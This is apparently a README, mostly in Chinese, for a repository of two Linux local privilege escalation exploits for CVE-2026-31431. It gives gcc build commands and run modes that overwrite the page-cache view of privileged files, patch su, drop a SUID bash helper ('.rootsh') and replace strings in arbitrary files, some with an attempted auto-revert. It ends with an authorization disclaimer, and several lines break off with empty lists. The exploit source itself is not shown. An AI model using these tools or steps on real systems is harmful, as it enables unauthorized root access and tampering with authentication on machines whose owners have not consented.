
Linux local privilege escalation exploits for CVE-2026-31431, including raw and recoverable workflows.
这两份 Linux 本地提权利用实现都属于运行时破坏性利用。
它们会覆写高权限目标文件的运行时 page-cache 视图,例如:
supatch 模式里手工指定的文件这通常不是常规意义上的持久化落盘改文件,但它会立即改变运行时行为,并直接影响认证 / 提权流程。
当前仓库不提供真正无破坏性的 root 模式。
copyfail_raw_su_root.ccopyfail_portable_lpe.c两者都只面向 Linux。
后续更新中可能会补充适配更多架构的预编译版本。
gcc -O2 -s copyfail_portable_lpe.c -o copyfail_portable_lpe
gcc -O2 -s copyfail_raw_su_root.c -o copyfail_raw_su_root
对于 copyfail_portable_lpe.c,直接运行:
./copyfail_portable_lpe
默认使用 auto-revert。
也就是说,它会优先尝试可恢复工作流:
如果可恢复模式失败,程序会打印 fallback 模式提示。
最小 raw 版本:
susu./copyfail_raw_su_root
更通用的多模式版本。
显式的非回滚模式:
./copyfail_portable_lpe auto
可恢复优先模式:
./copyfail_portable_lpe
./copyfail_portable_lpe auto-revert
不回滚,直接落 SUID bash helper:
./copyfail_portable_lpe helper ./.rootsh
先落 helper,再尝试恢复 patch 目标:
./copyfail_portable_lpe helper-revert ./.rootsh
对指定文件做同长度字符串替换:
./copyfail_portable_lpe patch <file> <find> <replace>
走 raw su patch 路线:
./copyfail_portable_lpe raw-su-elf
auto-revert 和 helper-revert 依然是利用过程有破坏性的模式。
它们只是会在利用完成后尝试恢复,也就是:
所以它属于:
先破坏,再恢复
而不是真正的无破坏利用。
auto / auto-revert / helper / helper-revert / patch:更偏 Linux 通用,现场编译时与目标架构自动匹配raw-su-elf:x86_64 Linux only本仓库内容仅用于:
不要在未获得系统、账号或网络所有者明确授权的情况下使用本仓库中的代码、利用方式或相关思路。
本仓库内容按 as-is(现状) 方式提供,不附带任何明示或默示保证。作者与贡献者不对因使用、误用或二次传播本仓库内容而导致的任何后果负责,包括但不限于: